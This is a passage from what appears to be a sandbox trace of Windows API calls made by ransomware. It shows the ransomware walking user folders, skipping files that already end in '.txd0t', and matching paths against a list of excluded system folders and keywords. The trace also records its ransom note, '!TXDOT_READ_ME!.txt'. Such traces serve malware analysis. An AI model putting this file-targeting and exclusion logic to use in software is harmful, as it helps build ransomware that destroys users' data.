psz1="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg.txd0t" [0119.910] PathFindExtensionW (pszPath="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t") returned=".txd0t" [0119.910] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.910] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c31360, ftCreationTime.dwHighDateTime=0x1d5eac7, ftLastAccessTime.dwLowDateTime=0x9f0a2830, ftLastAccessTime.dwHighDateTime=0x1d5ef9b, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6d2f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", cAlternateFileName="XEJ8A4~1.TXD")) returned 1 [0119.910] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", psz2=".") returned 1 [0119.910] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", psz2="..") returned 1 [0119.910] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.910] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.910] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t" [0119.910] PathFindExtensionW (pszPath="Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned=".txd0t" [0119.910] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.910] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c31360, ftCreationTime.dwHighDateTime=0x1d5eac7, ftLastAccessTime.dwLowDateTime=0x9f0a2830, ftLastAccessTime.dwHighDateTime=0x1d5ef9b, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6d2f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Xej8a4-yl4uAkyUIiU1.jpg.txd0t", cAlternateFileName="XEJ8A4~1.TXD")) returned 0 [0119.910] FindClose (in: hFindFile=0xec1a70 | out: hFindFile=0xec1a70) returned 1 [0119.910] GetProcessHeap () returned 0xe30000 [0119.910] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.910] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0119.910] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0119.910] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0119.910] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0119.910] StrCmpW (psz1="Recent", psz2=".") returned 1 [0119.910] StrCmpW (psz1="Recent", psz2="..") returned 1 [0119.910] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0119.910] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0119.910] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0119.910] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.911] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.911] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Saved Games", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="ransomware") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.911] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0119.911] GetProcessHeap () returned 0xe30000 [0119.911] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b8) returned 0xef3600 [0119.911] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Saved Games", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0119.911] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Saved Games", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games\\*") returned="C:\\Users\\FD1HVy\\Saved Games\\*" [0119.911] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e70 [0119.912] StrCmpW (psz1=".", psz2=".") returned 0 [0119.912] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.912] StrCmpW (psz1="..", psz2=".") returned 1 [0119.912] StrCmpW (psz1="..", psz2="..") returned 0 [0119.912] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.912] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.912] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.912] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.912] FindClose (in: hFindFile=0xec1e70 | out: hFindFile=0xec1e70) returned 1 [0119.912] GetProcessHeap () returned 0xe30000 [0119.912] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.912] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5b010c55, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5b010c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0119.912] StrCmpW (psz1="Searches", psz2=".") returned 1 [0119.912] StrCmpW (psz1="Searches", psz2="..") returned 1 [0119.912] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.912] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.912] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Searches", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system32\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\local\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\boot\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\perflogs\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\programdata\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\drivers\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\wsus\\") returned 0x0 [0119.912] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.913] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.913] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="crypt_detect") returned 0x0 [0119.913] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="cryptolocker") returned 0x0 [0119.913] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="ransomware") returned 0x0 [0119.913] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\WINDOWS") returned 0x0 [0119.913] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.913] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="C:\\Program Files") returned 0x0 [0119.913] GetProcessHeap () returned 0xe30000 [0119.913] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xef3600 [0119.913] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0119.913] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\*") returned="C:\\Users\\FD1HVy\\Searches\\*" [0119.913] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5b010c55, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5b010c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1cb0 [0119.913] StrCmpW (psz1=".", psz2=".") returned 0 [0119.913] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5b010c55, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5b010c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.913] StrCmpW (psz1="..", psz2=".") returned 1 [0119.913] StrCmpW (psz1="..", psz2="..") returned 0 [0119.913] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5aeb98ca, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5aeb98ca, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5aeb98ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.913] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.913] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.913] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0119.913] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0119.913] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt" [0119.913] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.913] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.913] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.913] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.913] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.913] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.913] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.913] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.913] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.914] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.914] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.914] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.914] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.914] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.914] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.914] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.914] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.914] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.914] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.914] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44269063, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44269063, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5aeb98ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2f8, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="Everywhere.search-ms.txd0t", cAlternateFileName="EVERYW~1.TXD")) returned 1 [0119.914] StrCmpW (psz1="Everywhere.search-ms.txd0t", psz2=".") returned 1 [0119.914] StrCmpW (psz1="Everywhere.search-ms.txd0t", psz2="..") returned 1 [0119.914] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0119.914] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0119.914] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Everywhere.search-ms.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t") returned="C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t" [0119.914] PathFindExtensionW (pszPath="Everywhere.search-ms.txd0t") returned=".txd0t" [0119.914] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.914] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44242e24, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44242e24, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5aedf874, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2f8, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="Indexed Locations.search-ms.txd0t", cAlternateFileName="INDEXE~1.TXD")) returned 1 [0119.914] StrCmpW (psz1="Indexed Locations.search-ms.txd0t", psz2=".") returned 1 [0119.914] StrCmpW (psz1="Indexed Locations.search-ms.txd0t", psz2="..") returned 1 [0119.914] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0119.914] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0119.914] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="Indexed Locations.search-ms.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t") returned="C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t" [0119.914] PathFindExtensionW (pszPath="Indexed Locations.search-ms.txd0t") returned=".txd0t" [0119.914] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.914] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5b010c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", cAlternateFileName="WINRT-~1.TXD")) returned 1 [0119.914] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", psz2=".") returned 1 [0119.914] StrCmpW (psz1="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", psz2="..") returned 1 [0119.914] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Searches", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0119.914] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\") returned="C:\\Users\\FD1HVy\\Searches\\" [0119.914] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Searches\\", psz2="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t") returned="C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t" [0119.914] PathFindExtensionW (pszPath="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t") returned=".txd0t" [0119.914] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.915] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b71b019, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2b71b019, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5b010c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x557, dwReserved0=0x680e2c, dwReserved1=0x0, cFileName="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t", cAlternateFileName="WINRT-~1.TXD")) returned 0 [0119.915] FindClose (in: hFindFile=0xec1cb0 | out: hFindFile=0xec1cb0) returned 1 [0119.915] GetProcessHeap () returned 0xe30000 [0119.915] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.915] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, 